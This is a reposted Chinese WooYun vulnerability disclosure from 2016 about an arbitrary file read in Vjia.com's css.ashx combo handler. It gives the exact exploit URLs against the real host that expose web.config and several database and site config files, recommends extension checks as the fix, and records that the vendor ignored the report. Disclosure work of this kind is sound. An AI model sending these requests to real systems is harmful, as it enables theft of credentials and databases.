凡客旗下Vjia.com js/css combo可读取数据库配置文件

admin 2017年5月1日17:35:14评论400 views字数 239阅读0分47秒阅读模式
摘要

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-20: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(23) 关注此漏洞

缺陷编号: WooYun-2016-196809

漏洞标题: 凡客旗下Vjia.com js/css combo可读取数据库配置文件

相关厂商: 凡客诚品

漏洞作者: 路人甲

提交时间: 2016-04-15 22:23

公开时间: 2016-04-20 22:30

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误 设计不当 设计缺陷

6人收藏


漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

在访问凡客商城系统时,发现通过简单方式可查看数据库及站点信息配置文件,可能是由于程序中缺少逻辑判断导致。

详细说明:

在凡客Vjia.com列表页中查看源代码

凡客旗下Vjia.com js/css combo可读取数据库配置文件

复制用于js/css combo的URL到地址栏,将href后参数换作web.config

例:http://rscdn.vjia.com/css.ashx?href=web.config

凡客旗下Vjia.com js/css combo可读取数据库配置文件

及web.config中的appSettings节点下的配置均可读取

例如:数据库连接字符串

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config

凡客旗下Vjia.com js/css combo可读取数据库配置文件

以及更多

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml

可能会被脱裤

漏洞证明:

在凡客Vjia.com列表页中查看源代码

凡客旗下Vjia.com js/css combo可读取数据库配置文件

复制用于js/css combo的URL到地址栏,将href后参数换作web.config

例:http://rscdn.vjia.com/css.ashx?href=web.config

凡客旗下Vjia.com js/css combo可读取数据库配置文件

及web.config中的appSettings节点下的配置均可读取

例如:数据库连接字符串

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Connection.config

凡客旗下Vjia.com js/css combo可读取数据库配置文件

以及更多

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/Parameters.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/WebSite.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/RSConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SearchConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SolrCoreConfig.xml

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/CacheConfig.config

http://rscdn.vjia.com/css.ashx?href=/ConfigFiles/SortConfig.xml

修复方案:

在css.ashx和js.ashx一般处理程序中加入扩展名校验即可,非js或css文件不执行合并输出

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-20 22:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-04-21 08:05 | 丶兜兜装满爱 ( 路人 | Rank:2 漏洞数:1 | 学生党,求带走。。。)

    0

    脱裤,不解释。。。

  2. 2016-04-21 11:46 | zmx ( 普通白帽子 | Rank:164 漏洞数:43 | wooyun)

    0

    公司能活着就不错了,哪有功夫管安全问题?

  3. 2016-04-21 13:58 | 0nise ( 路人 | Rank:2 漏洞数:2 | 不闻不问,净静竞敬。 By:0nise)

    0

    这都能忽略?

  4. 2016-04-21 15:17 | 莱纳斯 ( 路人 | Rank:19 漏洞数:2 | 花式钓鱼,Xss learner)

    0

    这都能忽略。。

  5. 2016-04-22 10:57 | 菜鸟小Q ( 普通白帽子 | Rank:205 漏洞数:56 | 坚定自己的信仰并一直做下去......)

    0

    这是什么数据库配置啊?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin